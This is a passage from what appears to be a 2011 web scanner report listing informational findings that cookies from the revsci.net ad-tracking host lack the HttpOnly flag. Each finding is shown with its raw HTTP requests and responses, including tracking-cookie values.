Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV594t6370FESU50e19nKCDeVRxV0pPvV/yUINBxjwRSIooUUZKyvzimW1udzH0uw6mWx+zWRJ7JnGfOpf0Ud/9xHuDtILCncfzqXUamLmmKDVc2I07MSrhYndj0mALnNBwrT+E9TvrxIKkcXN22L9aL0nb73wT+opCYT6f0AA8qclZDQfKpaVbx01CfUHl715ZLhdoPmzvwD1+aYUgzsUGyMrSP14ZmVjwcT+5TxbifLChKdJao6WHWpWV4ShZanM/hfPFH/lF0HVty1iwPB3d5TFqLHW/6YY7Ok/Z2JKoKHEl7SFnRArw==; rtc_ZDRt=MLsv7iUucA5nprADwxMU7dS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPrdSk21eU9Lpyn2tzgwRP0c/xxljHTX7BOLqY4BgQC03lRGEmvvtSk5ED4IMDjv8yVDLIK7pDAruXGuNrqWcYC2y8NTEmqwp1W1r3QCTBMPKlKt8h8jhogkQYAEg5VB8arCKp0tKwd34RoQt9pfCo91MbMw2aFSr6asrqy72fdH+/zLkZMRMy3ciFEOFuAAUeQuwVGfb3k3GVzU53rLUI0DvmM+6V5MRX1CqiXP3mwBN1MQ8mPvGr+qM8YE4h9IgMnmrTH8vdwVzzmKxdAFML67Dft3ETWNo373nILFCOSd1vgwNYXcTuHTqYEl4k5deAJ/QaLuaTNFARLE0GJGZm144sbAffZWpSi/OK979TxuQBnYIYB1WHNnx7GJBucarx4=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZDRt=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBLwIMVp8ceRNDq2qI6PksTn9J0QSlgYlQhPrU/yUINJwrcQgYrocUZKyvzimW9stkryykBGWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTC1dntz9NMPA0y2boUy5YvzZcSjm3tpd47YdWtojAsSJVdmaywtLPjnkqOd7O5PXvEu8+NH0vSpTTZYXkTkF3x2lf/+QSn1zllHsIyVTCkvfhkvAtzGJQB4xg6bp5oT7zuhgB5r6Y62eaYMOVdwEQy5yJLWr53Cfi9mFAog==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:45 GMT; Path=/
Set-Cookie: rtc_-Odm=MLsv8SUucA5nprADo8Nq7dG30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFOpPrNSkm1eU9Lpin2x9jJdbuKtNkElLVE051AluTuDnRDieHkyvaZNMAKnMOnxWWEt8Bj2ZwKECyW0ZU/wYMurf3oH/xJXerILxH/z3W8t0as+z/3fJ8azYrm12OFroSv3dkRCrzSdbJ66D0Dt9pfio56UesBj+1SLyZM8fJnR4MNTI0wzO41bbP1Wws8UaQ/4AuRitULgKokR7aSBTL/fY/adIXHS4s1pNFsz2sFWsx5QC99bfHaXZ4zQpVwoJJzZTD9kvrdMDCgOltk2DQT2lKk0FDcxaMKw7/KxVDLSlk+RBRhjcN1Xj/tWNoaFV9sbtoigkBD83eZUXFOzMKJ6uEXoIZDzkIGr0PoLrM+t2W7ciP0X6oF/RXzuO7qRtCJao66pQ0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:59:45 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:59:44 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.139. http://pix04.revsci.net/E05511/b3/0/3/0902121/700224037.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/700224037.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/700224037.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252Fglobal%252Flink.asp%253FL%253D104054%2526function%253Dmanageprofile%2526mode%253Dlogin%2526referrer%253Dhttp%25253A%252F%252Fwww.wcax.com%252Fglobal%252Flink.asp%25253FL%25253D104054%252526function%25253Dmanageprofile%252526mode%25253Dcreate%252526referrer%25253Dhttp%2525253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%2525253FL%2525253D398823%2526affname%253DWCAX%2526adtag%253DRegistration%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252Fglobal%252Flink.asp%253FL%253D104054%2526function%253Dmanageprofile%2526mode%253Dcreate%2526referrer%253Dhttp%25253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%25253FL%25253D398823%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/global/link.asp?L=104054&function=manageprofile&mode=login&referrer=http%3A//www.wcax.com/global/link.asp%3FL%3D104054%26function%3Dmanageprofile%26mode%3Dcreate%26referrer%3Dhttp%253A//www.wcax.com/Global/link.asp%253FL%253D398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_l71z=MLsv7iMucD5npqgDC0e9A9S30MEszwLosfaz5fWZ65hV2fUeqlt8L6cj/qSrEX5/s8WnsS00IKdsJuIlbI0n6i5mCFMCk/DX0ZUZhQNOqEqv6ZJx9H7x4sWwa0LKdLu6EDs2kZV8061wlsTiDnxDiSHnPc+ZMsR67OfyuVuRW+F5iRkzlcSm/OepgsdXo88JhULWLh4a8A6PyDf903KoAeUpitP4N3NHYKrDRno2A2G7cKcnRxKVxwMcXyZShLrki39i5R2d0TDalpcI3lQLOzWjSjYjgqHDlwIgVLwfpXxffwb2O+079hdYhGZkfhCjDm663gi652dE4tuvo0Wk6TBEetIB0B851bjeN97FHa1+AcoTzJ7vr9miJTCPeFwcdknuxboNaAb30giKRMoAYZA4YbUzrt9+lX/Y4xR8j5Zql80uS1MWG+qf2bN9oL3Kb6AfYwp9dbQvTTz1fmKCvi1xxnAWV3rx4+GReBq6rIo=; rsi_segs_1000000=pUPFJ0OBLwIMVp8ceRNDq8maNxmQEThmUA+HR+nmRzwm8QPcP9x647po7dW5vrupC8lCs6D/OrhgYgORMH2eSavdl6IYzEk0uIESUewwwmOKkXNnorhALJozV7bhzVmEfY7eCxU7MWjQim3y3th8Malcku2Afxf//MrMObaH93rWa7ZhUsfEturVlH6WamUby0tSFEavYsJrsQLSCjPlbSTZdRfrCgJVRf8Dd7Jhv99cIoBp05o1oiKWL8a7+WY7Eb1wNPVr87BCFhol0fBCmZ3x/n4axhNU4j896AhedNlpzBXshSy0fQO6ucWXjw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_l71z=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637UACbRNpW80lkUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+EgL9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8id0bEE9wVyvXGviU4q2/8L7DKCUk26klWSoHqqXGI+Go0k+jVWKqsXLUpqBJOEA2F/gm+KkRHDXs8D+qwKzVzBzryUjYCqrtRa5EyIw6SRZuNrKIzCR7NTb3NFQ9sURGxHaosyq7i49P+gqmI3N8elFX335OAQ9t6XYqZPI4yH+Q+Ir0aAT; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:27 GMT; Path=/
Set-Cookie: rtc_X7G4=MLsv8SMucD5nprADC+dAdB3TWgyy2mghBM3EFhQOAZ/gWNQv0Gro+BWjQ4EZLeo310XdXThxtQ6zdDA6J56uUqSv9qW8WduZgAsZhQNOpEq375QA5H5xY8WwU0LKdLuKEDsyFgLs2QD8nLdDzO0REKiqyMaZNMAKnMOnxXWEt8BjuZwKECyW0ZU/wYMuLfzoH/xvc6ywJ1W113TC0bnUQuUBso9vh5RFanDIGZ2QiD0apxJXYQJ3YRuQwyAQiH53Gnljo3T2HFXnMDtm7poq+UoB4RO6FWYEuNgDNyjEaq/g47KKpWhKrWKg6d7RzIqaR34ol/UyR6hDqg+9O85GQG43imOZzWup0YgPP+srSHoErx8roGJPP1d+O+kR6HEaauAX4x6nTM+FXHdYj4fjovLuNWTZDP2DZbds4wvJmpLIJZNXcbptyl9/9gulineUIz0/ATSO02q23EcUpGL65sV23BazOIoRQl98h+CXWg/apXs=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:27 GMT; Path=/
X-Proc-ms: 27
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:38:26 GMT
Content-Length: 593

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
6.140. http://pix04.revsci.net/E05511/b3/0/3/0902121/71706519.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/71706519.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/71706519.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D398823%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D452989%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_tCdk=MLsv8SUucA5nprADwxMUZdS30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFepPrNSkm1eU9Lpin2xzgwRP18/xxpkNoVxqc5g0K0i0fqu3Z4OZ9TCWukp+fzOXqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lr/3fAwOzCWOZFcV4p1IbmF2CVroSv3ekRCrxTkn5Gj5BfK6lws/9BSK4R70kIxYgnwBeKw5gxrJ3HWM6FdzLDP5HzR2IBwJkmQi2PJ2/xBDCzSRK2+IWaGVbp6A4vS07+Pp50Hceyamh9kzCVl5fXWYJfEHo3UDxtErrqNDBNGococWXvmK9Mn9/Q6WuUqV6V5eL076M1x6tZ+Kt2nJxiCiipnhEvR401rHK3bALb6xPrlKqYCmmWIf+v0EeQWP5MoKcUvGL45sV23Lj6SqCX5B1KhaG/GlEdpdM=; rsi_segs_1000000=pUPFJ0OBb3IQV+Ubea770FESU6i2AtnKCDeVRxV0pFsimSbWBw8RKQZQqGmcAHhFlCQnpMeUtFmK7mWx+zWRJ7JnGfOpf0Ud/9xHuDtILCncfzqXUSnG/Cy3tsi7pMKrY9q7DERCZ0T3/lunM2xMQBSBJVEUv2Uw97XNucSu771FPtNXv47fO/viciwUhcA8skS3XxAbh9FYRtizsGzWxf2wCDk/qOZEMEWUzkg85B0kOvfpQj49pE2cRV2TdXsWyFivNB3CVfavnL5cSKl9Elq+WkafICs8jjFD8pPstcQPdfqkOa2OLpKV3DjiTtlApA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_tCdk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBLwIMVp8ceRNDq2qIaG8wTn9J0QSlgYlQhPrU/yUINJwrcQgYrocUZKyvzimW9stkryykBGWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSZEzVuCAX4vuAkY5No9S7WbpjYUkfOfEJDXAgKmsLWwTS/CGoon/DEpNQYbaAFrcxnKamICZluB2Bp82SYiW3ovSEOT9qT4a5l4tOd5O5fXvErcTC+Pkal6xqMP03V7uhGtf/+QSn1zllHsOyVTCkvfhck0q5FMss9raCXJCcgV0B7cfnXm5BKxNyXooQEl3mzrI70AREyLSCQNApQ==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:08 GMT; Path=/
Set-Cookie: rtc_Xfh5=MLsv7iUucA5nprADwxMUR9Sz0MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBepPr9SkW1eU9LpSn2tzgwRP0c/xx5jIRX7BMLqY4BgQC03lxOEmvvtSk5ET4IMDzv8yWjLYK7pDAruXWuMrqWQYCGy8NcEmqwJlS1r3QCTBMPKlGt8h8jhoskQYAEg5VB6abCKt0ty7d4V0r5LMiHjJ1yDDxjo3fWHFdlT0J3x3vNTBOP3u4LdR/ixLPJ4yHO+zAfzaP4HygF1suDMBuT4oX+Q3ErH7vVwhv5PsadCEykM5nhDDFNysSgXBEG+twoDa14AcpRzAbhEsFenqXNxpvSYpqc3Iy2NCgIfu7mw81csoIeKwTlkp9olnajK1wOkRn/RbFuU1Ma+eqf2bJ54C9QYGm/4BYb5mYPHUYbSUBiWvzEkXm4bqgQDP0t5t9xesus2w==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:08 GMT; Path=/
X-Proc-ms: 26
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 13:16:07 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.141. http://pix04.revsci.net/E05511/b3/0/3/0902121/734832866.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/734832866.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/734832866.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%2526affname%253DWCAX%2526adtag%253DPolitical%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18197%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
